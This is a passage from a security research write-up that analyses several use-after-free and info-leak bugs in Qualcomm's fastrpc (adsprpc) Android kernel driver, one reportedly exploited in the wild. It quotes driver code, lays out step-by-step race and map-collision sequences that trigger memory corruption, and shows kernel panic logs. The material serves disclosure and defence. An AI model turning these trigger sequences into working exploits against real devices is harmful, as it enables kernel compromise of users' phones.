    This means that the global mutexing architecture is not enough to prevent two concurrent invocations of the fastrpc mapping ioctl calls, even if a global map is being created. This itself is not a bug, but even after insertion of a global map onto the global map list, fastrpc_internal_mem_map continues to access the map even though it should really be considering its reference to the global map “consumed”. Crucially, if a global map is created and added to the global list, it is immediately visible to concurrent callers - a thread calling fastrpc_internal_munmap with a different adsprpc fd / fl struct could destroy the global map while fastrpc_internal_mem_map continues to use it (see [1] in the above code sample from fastrpc_internal_mem_map). This is an example of continuing to use a transient reference after transferring that reference to a data structure where the lifetimes of the residing objects are userland-managed  - another example would be using  a struct file object after installing the only reference in a file descriptor table (via fd_install) at which point userland can drop the reference using the close(2) syscall.

    Triggering this bug generates the following kernel panic with PAGE_POISON enabled:

    [ 2890.558370] [0:            poc:22189] Unable to handle kernel paging request at virtual address 006b6b6b6b6b6b83

    [ 2890.558411] [0:            poc:22189] PC Code: 95ca6fb3 aa1703e0 2a1f03e1 97ffdbcc 2a1f03f6 14000008 f9400ae8 (f8418d09) f90002e9 b4000049 f9000537 f9000117 f90006e8 aa1403e0 95ca66a2 aa1303e0 95ca66a0 d5384108 f942f108 f94007e9

    [ 2890.558618] [0:            poc:22189] LR Code: 94000075 2a0003f6 aa1403e0 95ca66ed f94003f7 340006f6 b4000937 aa1403e0 95ca6feb (b94026e8) 7100211f 54000060 7100111f 54000721 b00000f8 91038318 91008315 aa1503e0 95ca97d3 f9400308

    [ 2890.558633] [0:            poc:22189] Mem abort info:

    [ 2890.558641] [0:            poc:22189]   ESR = 0x96000004

    [ 2890.558650] [0:            poc:22189]   EC = 0x25: DABT (current EL), IL = 32 bits

    [ 2890.558661] [0:            poc:22189]   SET = 0, FnV = 0

    [ 2890.558670] [0:            poc:22189]   EA = 0, S1PTW = 0

    [ 2890.558678] [0:            poc:22189]   FSC = 0x04: level 0 translation fault

    [ 2890.558688] [0:            poc:22189] Data abort info:

    [ 2890.558696] [0:            poc:22189]   ISV = 0, ISS = 0x00000004

    [ 2890.558704] [0:            poc:22189]   CM = 0, WnR = 0

    [ 2890.558713] [0:            poc:22189] [006b6b6b6b6b6b83] address between user and kernel address ranges

    [ 2890.558727] [0:            poc:22189] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    [ 2890.559162] [0:            poc:22189] sec_arm64_ap_context:sec_arm64_ap_context_on_die() context saved (CPU:0)

    ...

    [ 2890.560996] [0:            poc:22189] CPU: 0 PID: 22189 Comm: poc Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1

    [ 2890.561007] [0:            poc:22189] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [ 2890.561014] [0:            poc:22189] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [ 2890.561024] [0:            poc:22189] pc : fastrpc_internal_munmap+0x1ac/0x264 [frpc_adsprpc]

    [ 2890.561202] [0:            poc:22189] lr : fastrpc_internal_munmap+0xb4/0x264 [frpc_adsprpc]

    [ 2890.561376] [0:            poc:22189] sp : ffffffc025ee3cc0

    [ 2890.561382] [0:            poc:22189] x29: ffffffc025ee3cd0 x28: ffffff88bf4fbb80 x27: 0000000000000000

    [ 2890.561397] [0:            poc:22189] x26: 0000000000000000 x25: 0000000000000000 x24: ffffff8922ae4301

    [ 2890.561411] [0:            poc:22189] x23: ffffff803bb30900 x22: 0000000080000448 x21: ffffff8928fb5800

    [ 2890.561424] [0:            poc:22189] x20: ffffff8928fb5910 x19: ffffff8928fb5940 x18: ffffffc00b492010

    [ 2890.561437] [0:            poc:22189] x17: 00000000000003e7 x16: 0000000000007e00 x15: 0000000000000600

    [ 2890.561450] [0:            poc:22189] x14: ffffff891cc57e00 x13: dee89d8ccc1e57a7 x12: 088000400811164c

    [ 2890.561463] [0:            poc:22189] x11: ffffff891cc51a00 x10: ffffff88bf4fbb80 x9 : 0000000000000000

    [ 2890.561476] [0:            poc:22189] x8 : 6b6b6b6b6b6b6b6b x7 : bbbbbbbbbbbbbbbb x6 : 00000000000000c0

    [ 2890.561489] [0:            poc:22189] x5 : 0000000000150009 x4 : ffffff891cc57400 x3 : 000000000015000a

    [ 2890.561502] [0:            poc:22189] x2 : ffffff88bf4fbb80 x1 : 0000000000000000 x0 : 0000000000000000

    [ 2890.561516] [0:            poc:22189] Call trace:

    [ 2890.561523] [0:            poc:22189]  fastrpc_internal_munmap+0x1ac/0x264 [frpc_adsprpc]

    [ 2890.561696] [0:            poc:22189]  fastrpc_device_ioctl+0x7e8/0x92c [frpc_adsprpc]

    [ 2890.561867] [0:            poc:22189]  __arm64_sys_ioctl+0x120/0x170

    [ 2890.561886] [0:            poc:22189]  invoke_syscall+0x58/0x13c

    [ 2890.561899] [0:            poc:22189]  el0_svc_common+0xb4/0xf0

    [ 2890.561908] [0:            poc:22189]  do_el0_svc+0x24/0x90

    [ 2890.561917] [0:            poc:22189]  el0_svc+0x20/0x7c

    [ 2890.561929] [0:            poc:22189]  el0t_64_sync_handler+0x84/0xe4

    [ 2890.561937] [0:            poc:22189]  el0t_64_sync+0x1b8/0x1bc

    [ 2890.561951] [0:            poc:22189] Code: 97ffdbcc 2a1f03f6 14000008 f9400ae8 (f8418d09)

    [ 2890.561967] [0:            poc:22189] ---[ end trace af6bd4fc06724258 ]---

    [ 2890.561978] [0:            poc:22189] Kernel panic - not syncing: Oops: Fatal exception

    PZ Issue 42451713 (fixed with CVE-2024-33060): Incorrect searching algorithm in fastrpc_mmap_find leads to kernel address space info leak

    The fastrpc_mmap_create function calls the function fastrpc_mmap_find with attacker controlled arguments in order to identify existing maps that already fulfill the map creation request and if an existing map fulfills the request, it simply takes a refcount on that map and returns (this is an important aspect of CVE-2024-49848 too, as we’ll see in the next section!). In the case of global maps it performs the following:

    hlist_for_each_entry_safe(map, n, &me->maps, hn) { 

        if (va >= map->va &&  //Is the userland provided va and len in the range of the map?

        va + len <= map->va + map->len && 

        map->fd == fd) { //And is the fd the same?

            if (refs) { 

                if (map->refs + 1 == INT_MAX) { 

                     spin_unlock_irqrestore(&me->hlock, irq_flags); 

                     return -ETOOMANYREFS; 

                } 

               map->refs++; 

            } 

            match = map; 

            break; 

        } 

    }

    While this code makes sense for fl local maps where map->va is set to a userland provided value, in the case of global maps they are set to a kernel struct page pointer that serves as an opaque handle for the allocated memory. Consequently, via fastrpc_internal_mem_map, an attacker can cause a userland provided value to be compared to a kernel struct page pointer. Furthermore the ioctl return value can differ based on whether the comparison returns true or false, allowing an attacker to brute force page pointer addresses associated with a fastrpc_map object.

    CVE-2024-49848: FASTRPC_ATTR_KEEP_MAP logic bug allows fastrpc_internal_munmap_fd to racily free in-use mappings leading to UAF

    One critically important aspect of the fastrpc_internal_mem_unmap and fastrpc_internal_munmap functions is their reliance on fastrpc_mmap_remove when trying to find a map to delete. This function contains a list of checks to attempt to ensure that it cannot free a map presently in use:

    //Entered with fl mapping mutexes held

    static int fastrpc_mmap_remove(struct fastrpc_file *fl, int fd, uintptr_t va,

                                   size_t len, struct fastrpc_mmap **ppmap)

    {

            struct fastrpc_mmap *match = NULL, *map;

            struct hlist_node *n;

            struct fastrpc_apps *me = &gfa;

            unsigned long irq_flags = 0;

    ...

            hlist_for_each_entry_safe(map, n, &fl->maps, hn) {

                    if ((fd < 0 || map->fd == fd) && map->raddr == va &&

                            map->raddr + map->len == va + len &&

                            map->refs == 1 && //verifies only 1 reference (from map creation)

                            /* Remove if only one reference map and no context map */

                            !map->ctx_refs && //And that no context holds a reference (important because context creation can create maps as well)

                            /* Skip unmap if it is fastrpc shell memory */

                            !map->is_filemap) {

                            match = map;

                            hlist_del_init(&map->hn);

                            break;

                    }

            }

            if (match) {

                    *ppmap = match;

                    return 0;

            }

            return -ETOOMANYREFS;

    }

    This function tries to ensure there can be no references to a map outside of the initial reference set upon creation of the map. This works as long as there are never any references to the map unassociated with an explicit reference (map->refs > 1 || map->ctx_refs > 0) concurrent to this function. This is in fact, precisely the invariant violated by CVE-2024-33060! In that case, we have a transient stack-based reference (from map creation) that doesn’t take an explicit reference (map->refs == 1) that is concurrent to this function (since the transient reference was held beyond the global mutexing lock).

    This invariant check is clearly a bit fragile to begin with, but there are at least two other paths to potential map destruction that don’t utilize this fastrpc_mmap_remove path and the guarantees it tries to provide. One of these paths is fastrpc_internal_munmap_fd:

    /*

     *        fastrpc_internal_munmap_fd can only be used for buffers

     *        mapped with persist attributes. This can only be called

     *        once for any persist buffer

     */

    int fastrpc_internal_munmap_fd(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_munmap_fd *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            ...

            mutex_lock(&fl->internal_map_mutex);

            mutex_lock(&fl->map_mutex);

            err = fastrpc_mmap_find(fl, ud->fd, NULL, ud->va, ud->len, 0, 0, &map);

            if (err) {

                    ...

                    mutex_unlock(&fl->map_mutex);

                    goto bail;

            }

            if (map && (map->attr & FASTRPC_ATTR_KEEP_MAP)) {

                    map->attr = map->attr & (~FASTRPC_ATTR_KEEP_MAP);

                    fastrpc_mmap_free(map, 0);

            }

            mutex_unlock(&fl->map_mutex);

    bail:

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    We can see that this function finds a map and calls fastrpc_mmap_free on that map if the flag FASTRPC_ATTR_KEEP_MAP is set. It also unsets this flag, so it’s impossible to call this function on the same map more than once.  Looking inside of fastrpc_mmap_create we see a corresponding line of code that adds an additional reference in the case where this flag is set:

    static int fastrpc_mmap_create(struct fastrpc_file *fl, int fd, struct dma_buf *buf,

            unsigned int attr, uintptr_t va, size_t len, int mflags,

            struct fastrpc_mmap **ppmap)

    {

            ...

            map = kzalloc(sizeof(*map), GFP_KERNEL);

            ...

            INIT_HLIST_NODE(&map->hn);

            map->flags = mflags;

            map->refs = 1;

            map->fl = fl;

            map->fd = fd;

            map->attr = attr;

            ...

            map->ctx_refs = 0;

            ktime_get_real_ts64(&map->map_start_time);

            if (mflags == ADSP_MMAP_HEAP_ADDR ||

                                    mflags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    ...

            } else if (mflags == FASTRPC_MAP_FD_NOMAP) {

                    ...

            } else {

                    if (map->attr && (map->attr & FASTRPC_ATTR_KEEP_MAP)) {

                            ADSPRPC_INFO("buffer mapped with persist attr 0x%x\n",

                                    (unsigned int)map->attr);

                            map->refs = 2; //References increases to 2

                    }

                    ...

                    map->va = va;

            }

            map->len = len;

            ...

            fastrpc_mmap_add(map);

            *ppmap = map;

    bail:

            ...

            return err;

    }

    However we can see that map->refs is only bumped in the default case where mflags isn’t equal to one of ADSP_MMAP_HEAP_ADDR, ADSP_MMAP_REMOTE_HEAP_ADDR or FASTRPC_MAP_FD_NOMAP. We can also see that regardless of the mflags value, it is possible to set FASTRPC_ATTR_KEEP_MAP - so it is still possible to create a FASTRPC_ATTR_KEEP_MAP map with map->refs == 1! This means that the map is visible to a fastrpc_internal_munmap_fd call which doesn’t guarantee the invariant provided by fastrpc_mmap_remove is unviolated when fastrpc_mmap_free gets called. This can be a problem for example, when a context takes a reference to a FASTRPC_ATTR_KEEP_MAP, FASTRPC_MAP_FD_NOMAP mapping in get_args:

    static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)

    {

            remote_arg64_t *rpra, *lrpra;

            remote_arg_t *lpra = ctx->lpra;

            ...

            int mflags = 0;

            ...

            for (i = 0; i < bufs; ++i) {

                    uintptr_t buf = (uintptr_t)lpra[i].buf.pv;

                    size_t len = lpra[i].buf.len;

                    mutex_lock(&ctx->fl->map_mutex);

                    if (ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            ctx->attrs[i], buf, len,

                                            mflags, &ctx->maps[i]);//Can take a reference to an existing mapping

                    if (ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    mutex_unlock(&ctx->fl->map_mutex);

    ...

            }

    map->ctx_refs is set to greater than zero, but this does not stop fastrpc_internal_munmap_fd’s call to fastrpc_mmap_free from calling kfree on the map:

    static void fastrpc_mmap_free(struct fastrpc_mmap *map, uint32_t flags)

    {

            ...

            if (map->flags == ADSP_MMAP_HEAP_ADDR ||

                                    map->flags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    ...

            } else {

                    map->refs--;

                    if (!map->refs && !map->ctx_refs)

                            hlist_del_init(&map->hn);

                    if (map->refs > 0 && !flags) //This is the only relevant bailout to avoid freeing map - ctx_refs value does not influence free decision

                            return;

            }

            ...

    bail:

            if (!map->is_persistent)

                    kfree(map); //Map is destroyed here!

    }

    This means it’s theoretically possible to create a UAF mapping if a fastrpc context holds the only reference to a FASTRPC_MAP_FD_NOMAP mapping with the FASTRPC_ATTR_KEEP_MAP attribute set. This cocktail of flags and attributes is possible with fastrpc_internal_mem_map, however it’s not immediately apparent how to cause a context to hold the only reference. The only intended circumstance where a context holds the sole reference to a map is when context creation and initialization leads directly to map creation - but in that map creation path, it’s not possible to specify the flags and attributes necessary to create the needed edge case. We need to have fastrpc_internal_mem_map create the map, have a context take a reference, and then somehow drop the initial reference that map creation provides. We cannot do this with fastrpc_internal_mem_unmap (because of the guarantees provided by fastrpc_mmap_remove) but we CAN racily do this by taking the fastrpc_internal_mem_map bailout after the map is created and a context has taken a reference!

    int fastrpc_internal_mem_map(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_mem_map *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            mutex_lock(&fl->internal_map_mutex);

            ...

            mutex_lock(&fl->map_mutex);

            VERIFY(err, !(err = fastrpc_mmap_create(fl, ud->m.fd, NULL, ud->m.attrs,

                            ud->m.vaddrin, ud->m.length,

                             ud->m.flags, &map))); //Create the map here

            mutex_unlock(&fl->map_mutex);

            ... //Have a context take a reference to the created map here

            VERIFY(err, !(err = fastrpc_mem_map_to_dsp(fl, ud->m.fd, ud->m.offset,

                    ud->m.flags, map->va, map->phys, map->size, &map->raddr))); //Fail this

            if (err)

                    goto bail; //bailout

            ud->m.vaddrout = map->raddr;

    bail:

            if (err) {

                    ...

                    if (map) {

                            mutex_lock(&fl->map_mutex);

                            fastrpc_mmap_free(map, 0); //Drop reference leaving the context as the only reference holder

                            mutex_unlock(&fl->map_mutex);

                    }

            }

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    Consider two concurrent processes (A and B) implementing the following sequence of events:

    [A]: Completely fills the dsp address space with valid mappings using fastrpc_internal_mem_map

    [A]: Creates a FASTRPC_MAP_FD_NOMAP map with attribute FASTRPC_ATTR_KEEP_MAP using fastrpc_internal_mem_map and enters into fastrpc_mem_map_to_dsp (holding internal_map_mutex, dropped map_mutex)

    map->refs == 1, map->ctx_refs == 0

    [B]: Invokes a call using FASTRPC_IOCTL_INVOKE2 and creates a context, get_args grabs the map mutex, finds and grabs a reference to map, drops the map mutex (not holding any mutexes)

    map->refs == 2, map->ctx_refs == 1

    [A]: fastrpc_mem_map_to_dsp fails as the dsp address space is completely full, fastrpc_internal_mem_map bails out and calls fastrpc_mmap_free, dropping the internal_map_mutex (not holding any mutexes)

    map->refs == 1, map->ctx_refs == 1

    [A]: Calls fastrpc_internal_munmap_fd grabs internal_map_mutex, and map_mutex, finds map with fastrpc_mmap_find, and calls fastrpc_mmap_free because the FASTRPC_ATTR_KEEP_MAP attribute is set

    map->refs == 0, map->ctx_refs == 1, mapping is kfree'd

    At the end of this sequence, an existing context still holds a reference to the freed map. An example crash from this bug is:

    [42694.423088] [0:            poc: 7171] Unable to handle kernel paging request at virtual address 006b6b6b6b6b6c27

    [42694.423153] [0:            poc: 7171] PC Code: b4000115 7100111f 540000c0 7100211f 54000080 (b940beb4) 71001e9f 54001ba2 7100211f 54000060 7100111f 54000c21 d0000120 91040000 95658fb7 b9406a68 aa0003e1 71000508 b9006a68 54000181

    [42694.423167] [0:            poc: 7171] LR Code: 2a1f03e1 97ffeafe (91002294) eb1402bf

    [42694.423229] [0:            poc: 7171] Mem abort info:

    [42694.423236] [0:            poc: 7171]   ESR = 0x96000004

    [42694.423243] [0:            poc: 7171]   EC = 0x25: DABT (current EL), IL = 32 bits

    [42694.423259] [0:            poc: 7171]   SET = 0, FnV = 0

    [42694.423265] [0:            poc: 7171]   EA = 0, S1PTW = 0

    [42694.423270] [0:            poc: 7171]   FSC = 0x04: level 0 translation fault

    [42694.423277] [0:            poc: 7171] Data abort info:

    [42694.423281] [0:            poc: 7171]   ISV = 0, ISS = 0x00000004

    [42694.423288] [0:            poc: 7171]   CM = 0, WnR = 0

    [42694.423294] [0:            poc: 7171] [006b6b6b6b6b6c27] address between user and kernel address ranges

    [42694.423304] [0:            poc: 7171] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    ...

    [42694.424942] [0:            poc: 7171] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [42694.424947] [0:            poc: 7171] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [42694.424954] [0:            poc: 7171] pc : fastrpc_mmap_free+0x58/0x734 [frpc_adsprpc]

    [42694.425067] [0:            poc: 7171] lr : context_free+0x130/0x2cc [frpc_adsprpc]

    [42694.425173] [0:            poc: 7171] sp : ffffffc036c4b8d0

    [42694.425178] [0:            poc: 7171] x29: ffffffc036c4b920 x28: 0000000000000000 x27: ffffffc036c4bba8

    [42694.425190] [0:            poc: 7171] x26: 0000000000000003 x25: 00000049216800d0 x24: ffffffc003d62390

    [42694.425198] [0:            poc: 7171] x23: ffffffc003d4ff88 x22: 0000000000000002 x21: 6b6b6b6b6b6b6b6b

    [42694.425206] [0:            poc: 7171] x20: 00000000ffffffff x19: ffffff88ef024d00 x18: ffffffc01e79d028

    [42694.425215] [0:            poc: 7171] x17: ffffffffffffffff x16: 0000000000000004 x15: 0000000000000004

    [42694.425222] [0:            poc: 7171] x14: ffffff8957f20000 x13: 0000000000001c4a x12: 0000000000000003

    [42694.425231] [0:            poc: 7171] x11: 0000000100449c4a x10: ffffff8846550040 x9 : 0000000000000000

    [42694.425239] [0:            poc: 7171] x8 : 000000006b6b6b6b x7 : 2820637072707364 x6 : 61203a726f727245

    [42694.425247] [0:            poc: 7171] x5 : ffffff88002ada57 x4 : 6363346478302041 x3 : 0000000000000000

    [42694.425255] [0:            poc: 7171] x2 : ffffff8846550040 x1 : 0000000000000000 x0 : ffffff88ef024d00

    [42694.425263] [0:            poc: 7171] Call trace:

    [42694.425267] [0:            poc: 7171]  fastrpc_mmap_free+0x58/0x734 [frpc_adsprpc]

    [42694.425373] [0:            poc: 7171]  context_free+0x130/0x2cc [frpc_adsprpc]

    [42694.425479] [0:            poc: 7171]  fastrpc_internal_invoke+0xb88/0x1ef4 [frpc_adsprpc]

    [42694.425584] [0:            poc: 7171]  fastrpc_internal_invoke2+0x320/0x408 [frpc_adsprpc]

    [42694.425689] [0:            poc: 7171]  fastrpc_device_ioctl+0x1b0/0x92c [frpc_adsprpc]

    [42694.425795] [0:            poc: 7171]  __arm64_sys_ioctl+0x120/0x170

    [42694.425805] [0:            poc: 7171]  invoke_syscall+0x58/0x13c

    [42694.425811] [0:            poc: 7171]  el0_svc_common+0xb4/0xf0

    [42694.425817] [0:            poc: 7171]  do_el0_svc+0x24/0x90

    [42694.425823] [0:            poc: 7171]  el0_svc+0x20/0x7c

    [42694.425828] [0:            poc: 7171]  el0t_64_sync_handler+0x84/0xe4

    [42694.425833] [0:            poc: 7171]  el0t_64_sync+0x1b8/0x1bc

    [42694.425842] [0:            poc: 7171] Code: 7100111f 540000c0 7100211f 54000080 (b940beb4)

    [42694.425853] [0:            poc: 7171] ---[ end trace 7349f07610aa0ad6 ]---

    [42694.425862] [0:            poc: 7171] Kernel panic - not syncing: Oops: Fatal exception

    CVE-2024-43047 (ITW): Map collision leads to UAF on 4.x kernels, and some 5.x kernel configurations

    At this point, it became apparent that two of these issues bear more than a passing resemblance to the exploit logs. The kernel panics (particularly the first one) strongly suggest that a fastrpc_mmap struct is involved in the initial memory corruption primitive, and the exploit makes calls to several ioctls that are responsible for the creation and administration of these structs. Additionally we previously saw memory corruption in the chain of structs/members map->fl->cid. The logs make a lot of sense in the context of a UAF of this fastrpc_mmap struct, meaning that CVE-2024-33060 and CVE-2024-49848 stand out as particularly plausible candidates to have been the ITW issue used by the attacker. However, if the exploit were triggering CVE-2024-33060, I would have expected it to generate some kernel log lines that we don’t see in the ITW artifacts. CVE-2024-49848 is disqualified on the basis of working upon strictly newer kernels than the ITW exploit was used against.

    Complicating the identification of the ITW bug, the exploit repeatedly hits several early bailouts in the ioctl handlers - these bailouts have no discernible side effect and it’s unclear why the exploit exercises this code at all. It is difficult to know what log lines from the exploit are due to this behavior and what log lines are related to the exploit exercising the bug used. But the kernel panics themselves do not lie. They are indisputable records of memory corruption, and (particularly in cases where the crash came from the exploit program itself) their associated stack traces are strong indicators of proximity to the bug or to the exploit strategy.

    A context treats references to a map differently depending on if the map is used as a buffer or as a handle. The context has a dynamically allocated array for map pointer references in ctx->maps, and both buffers and handles are referenced in this array.

    static int get_args(uint32_t kernel, struct smq_invoke_ctx *ctx)

    {

            ...

            uint32_t sc = ctx->sc;

            int inbufs = REMOTE_SCALARS_INBUFS(sc);

            int outbufs = REMOTE_SCALARS_OUTBUFS(sc);

            int handles, bufs = inbufs + outbufs;

            ...

            for (i = 0; i < bufs; ++i) { //buffer references

                    ...

                    if (ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            ctx->attrs[i], buf, len,

                                            mflags, &ctx->maps[i]);

                    if (ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    ...

            }

            ...

            handles = REMOTE_SCALARS_INHANDLES(sc) + REMOTE_SCALARS_OUTHANDLES(sc);

            ...

            for (i = bufs; i < bufs + handles; i++) { //handle references

                    ...

                    if (!dsp_cap_ptr->dsp_attributes[DMA_HANDLE_REVERSE_RPC_CAP] &&

                                            ctx->fds && (ctx->fds[i] != -1))

                            err = fastrpc_mmap_create(ctx->fl, ctx->fds[i], NULL,

                                            FASTRPC_ATTR_NOVA, 0, 0, dmaflags,

                                            &ctx->maps[i]);

                    if (!err && ctx->maps[i])

                            ctx->maps[i]->ctx_refs++;

                    if (err) {

                            for (j = bufs; j < i; j++) {

                                    if (ctx->maps[j] && ctx->maps[j]->ctx_refs)

                                            ctx->maps[j]->ctx_refs--;

                                    fastrpc_mmap_free(ctx->maps[j], 0);

                            }

                            ...

                    }

                    ...

            }

            mutex_unlock(&ctx->fl->map_mutex);

    However only buffers are freed using the pointer reference in ctx->maps. In fact, once handle maps are initialized without error, their reference in ctx->maps is never used again. Instead, the DSP is given a list of values associated with map file descriptors, and later passes these file descriptors back to the adsprpc driver in the AP once it is done using them. The AP then finds a map associable with the file descriptor returned by the DSP and drops a reference on it, potentially freeing it:

    static int put_args(uint32_t kernel, struct smq_invoke_ctx *ctx,

                        remote_arg_t *upra)

    {
    ...

    for (i = 0; i < M_FDLIST; i++) {

                    if (!fdlist[i])

                            break;

            if (!fastrpc_mmap_find(ctx->fl, (int)fdlist[i], NULL, 0, 0,

                                            0, 0, &mmap)) {

                            if (mmap && mmap->ctx_refs)

                                    mmap->ctx_refs--;

                    fastrpc_mmap_free(mmap, 0);

                    }
    ...

    }

    This is wrong because there is no guarantee that the map found and de-refcounted in put_args will be the same map that get_args previously took a reference on and it in fact could be a map still referenced by another context as a buffer. I discovered that this can happen if there are map collisions (cases where two created maps would fulfill a fastrpc_mmap_find request). Since fastrpc_mmap_find will find any mapping that encompasses the searched virtual-address range, you can create a mapping B that collides with future searches for mapping A by comprising a superset of mapping A's virtual address range, e.g. by setting mapB->va == mapA->va && mapB->len > mapA->len.

    An example of this map collision that leads to memory corruption is:

    1. Create a small mapping A with va == 0 using fastrpc_internal_mmap
    2. Create context 1, get_args gets a reference to mapping A as a handle.
    3. Create a BIG second mapping B with va == 0 using fastrpc_internal_mmap with the same fd as mapping A.
    4. Create context 2, grab a reference to mapping B as a buffer (vs a handle) so that we use the ctx->maps pointer.
    5. Complete context 1, causing put_args to be called. We find and drop a refcount on mapping B since it collides with mapping A. Mapping A’s refcount is permanently leaked.
    6. We then unmap mapping B using FASTRPC_IOCTL_MUNMAP

    Now there is a still valid context (context 2 in the above example) that still has a reference to mapping B even though mapping B was freed. Here’s an example kernel panic when triggering this bug:

    [93168.108618]  [3:            poc: 8227] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000018

    [93168.108656]  [3:            poc: 8227] Mem abort info:

    [93168.108675]  [3:            poc: 8227]   ESR = 0x96000006

    [93168.108696]  [3:            poc: 8227]   Exception class = DABT (current EL), IL = 32 bits

    [93168.108716]  [3:            poc: 8227]   SET = 0, FnV = 0

    [93168.108735]  [3:            poc: 8227]   EA = 0, S1PTW = 0

    [93168.108754]  [3:            poc: 8227] Data abort info:

    [93168.108773]  [3:            poc: 8227]   ISV = 0, ISS = 0x00000006

    [93168.108792]  [3:            poc: 8227]   CM = 0, WnR = 0

    [93168.108816]  [3:            poc: 8227] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000a5933260

    [93168.108837]  [3:            poc: 8227] [0000000000000018] pgd=08000001926ef003, pud=08000001926ef003, pmd=0000000000000000

    [93168.108905]  [3:            poc: 8227] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    [93168.108928]  [3:            poc: 8227] Modules linked in:

    [93168.108951]  [3:            poc: 8227] Process poc (pid: 8227, stack limit = 0x0000000041a3591e)

    [93168.108979]  [3:            poc: 8227] CPU: 3 PID: 8227 Comm: poc FTT: 0 0 Tainted: G S      W         4.19.113-27095354 #1

    [93168.109000]  [3:            poc: 8227] Hardware name: Samsung X1Q PROJECT - SM-G981V_REV0.3_PV3 (board-id,20) (DT)

    [93168.109024]  [3:            poc: 8227] pstate: 80400005 (Nzcv daif +PAN -UAO)

    [93168.109047]  [3:            poc: 8227] pc : dma_buf_unmap_attachment+0x20/0x58

    [93168.109069]  [3:            poc: 8227] lr : fastrpc_mmap_free+0x3dc/0x4e8

    [93168.109088]  [3:            poc: 8227] sp : ffffff80302239c0

    [93168.109107]  [3:            poc: 8227] x29: ffffff80302239c0 x28: 0000000000000002 

    [93168.109131]  [3:            poc: 8227] x27: 0000000000010100 x26: ffffff8030223bf0 

    [93168.109154]  [3:            poc: 8227] x25: ffffffc0c518f410 x24: ffffffc09152ce00 

    [93168.109177]  [3:            poc: 8227] x23: ffffff800b48d0b0 x22: 0000000000010000 

    [93168.109199]  [3:            poc: 8227] x21: 00000004f79e0000 x20: 0000000000000003 

    [93168.109222]  [3:            poc: 8227] x19: ffffffc0145d2e00 x18: 0000000000000000 

    [93168.109244]  [3:            poc: 8227] x17: 0000000000000000 x16: a70d810816bbf5af 

    [93168.109267]  [3:            poc: 8227] x15: 0000000000000008 x14: 0000000080000000 

    [93168.109289]  [3:            poc: 8227] x13: 0000000034155555 x12: 001d067cf6237800 

    [93168.109312]  [3:            poc: 8227] x11: 0000000000000007 x10: 0000000000000003 

    [93168.109334]  [3:            poc: 8227] x9 : 0000000000000000 x8 : 0000000000000000 

    [93168.109357]  [3:            poc: 8227] x7 : 0001010000000004 x6 : ffffff8030223c08 

    [93168.109379]  [3:            poc: 8227] x5 : ffffff8030223c08 x4 : 0000000000000004 

    [93168.109401]  [3:            poc: 8227] x3 : 0000000037c648b0 x2 : 0000000000000000 

    [93168.109423]  [3:            poc: 8227] x1 : ffffffc111df9800 x0 : ffffffc111df9680 

    [93168.114754]  [3:            poc: 8227] Call trace:

    [93168.114777]  [3:            poc: 8227]  dma_buf_unmap_attachment+0x20/0x58

    [93168.114799]  [3:            poc: 8227]  fastrpc_mmap_free+0x3dc/0x4e8

    [93168.114821]  [3:            poc: 8227]  fastrpc_internal_invoke+0x1654/0x24b0

    [93168.114843]  [3:            poc: 8^R27]  fastrpc_device_ioctl+0xcd4/0x1df8

    [93168.114865]  [3:            poc: 8227]  do_vfs_ioctl+0x6f0/0xac0

    [93168.114887]  [3:            poc: 8227]  __arm64_sys_ioctl+0x74/0xa8

    [93168.114909]  [3:            poc: 8227]  el0_svc_common+0xd8/0x188

    [93168.114931]  [3:            poc: 8227]  el0_svc_handler+0x6c/0x90

    [93168.114952]  [3:            poc: 8227]  el0_svc+0x8/0x280

    [93168.114977]  [3:            poc: 8227] Code: b4000121 f9400008 b40000e8 f9401108 (f9400d08) 

    [93168.115002]  [3:            poc: 8227] ---[ end trace 2a2f45652740934f ]---

    [93168.197067]  [3:            poc: 8227] Kernel panic - not syncing: Fatal exception

    Another researcher, Conghui Wang appears to have discovered a different path to reach the same bug that does not involve map collisions - since the code running on the DSP can be from an unsigned ELF binary uploaded by the attacker, it’s possible for an attacker to simply have the DSP send back bogus fd’s in an RPC response, causing the AP kernel to free mappings that are still referenced.

    This bug retains a similarly high level of resemblance to the original In-The-Wild exploit as bugs CVE-2024-33060 and CVE-2024-49848 did. It appears to be a UAF on the same object that was likely exploited given the ITW kernel logs (struct fastrpc_mmap), and unlike the other discovered bugs cannot be disqualified on the basis of non-intersecting version ranges or log messages. While we cannot prove beyond a doubt that this is the same bug used by the ITW attacker, after careful consideration TAG and Project Zero determined that this issue met the bar for being considered as exploited ITW. We are confident that this driver is under active exploitation by real-world attackers and that all the bugs resolved as part of this research had an outsized impact in preventing in-the-wild exploitation.

    Excavating an exploit

    After discovering these issues, I looked into potential ways to exploit a fastrpc_mmap struct vulnerability. Finding a compatible object to heap spray that would yield a meaningfully improved primitive (especially without an ASLR leak) is not a trivial task for this bug. While looking across the Linux kernel for useful objects to spray, my attention was once again drawn back to the ITW exploit logs, in particular the logs we saw previously involving an invalid channel id:

    [   40.917577] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

